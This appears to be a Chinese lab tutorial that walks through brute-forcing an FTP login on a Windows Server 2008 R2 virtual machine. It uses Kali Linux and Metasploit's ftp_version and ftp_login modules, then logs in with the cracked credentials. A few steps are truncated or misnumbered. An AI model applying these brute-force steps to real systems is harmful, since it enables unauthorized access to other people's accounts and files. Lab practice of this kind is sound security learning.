鲁达 一、背景介绍
ftp是用来在两台计算机之间传输文件,是Internet中应用非常广泛的服务之一。它可根据实际需要设置各用户的使用权限,同时还具有跨平台的特性,即在UNIX、Linux和Windows等操作系统中都可实现FTP客户端和服务器,相互之间可跨平台进行文件的传输。因此,FTP服务是网络中经常采用的资源共享方式之一。FTP协议有PORT和PASV两种工作模式,即主动模式和被动模式。
FTP(File Transfer Protocol)即文件传输协议,是一种基于TCP的协议,采用客户/服务器模式。通过FTP协议,用户可以在FTP服务器中进行文件的上传或下载等操作。虽然现在通过HTTP协议下载的站点有很多,但是由于FTP协议可以很好地控制用户数量和宽带的分配,快速方便地上传、下载文件,因此FTP已成为网络中文件上传和下载的首选服务器。同时,它也是一个应用程序,用户可以通过它把自己的计算机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。FTP服务的功能是实现完整文件的异地传输。
二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.受害者Win2008 server R2虚拟机一个;
3.整装待发的小白一个。
三、渗透攻防
3.1 运行ftp_version 漏洞利用框架,如下图所示。
命令:run
获取到FTP Banner 如下图所示:Microsoft FTP Service\x0d\x0a
3.2 返回 ftp_version漏洞框架的上一层,如下图所示。
命令:back
3.3 检索Metasploit(msf)框架对于ftp_login的漏洞模块,如下图所示。
命令:search ftp_login
3.4 利用见多到的ftp_login漏洞模块,如下图所示。
命令:use auxiliary/scanner/ftp/ftp_login
3.5 查看ftp_login漏洞利用模块的参数,如下图所示。
命令:show options
RHOSTS:受害者主机IP
THREADS:线程数
USERNAME:FTP用户名
PASS_FILE:密码文件
3.6 设置RHOSTS参数,如下图所示。
命令:set rhosts 192.168.78.165
3.7 设置USERNAME参数,如下图所示。
命令:set username test1
3.8 设置PASS_FILE参数,如下图所示。
命令:set pass_file /roo
3.8 设置THREADS参数,如下图所示。
命令:set threads 5
3.9 查看参数配置结果(参数是否配置成功),如下图所示。
命令:show options
3.10 执行ftp_login漏洞利用模块,如下图所示。
命令:run
如下图所示,ftp服务暴力破解成功。
3.11 命令行远程登录ftp服务,如下图所示。
命令:ftp IP(ftp 192.168.78.165)
3.12 浏览器URL栏登录FTP服务,如下图所示。
步骤:URl栏输入ftp://IP 在弹出窗口利用破解到的账户信息登录。
3.13 浏览器登录FTP服务成功,如下图所示。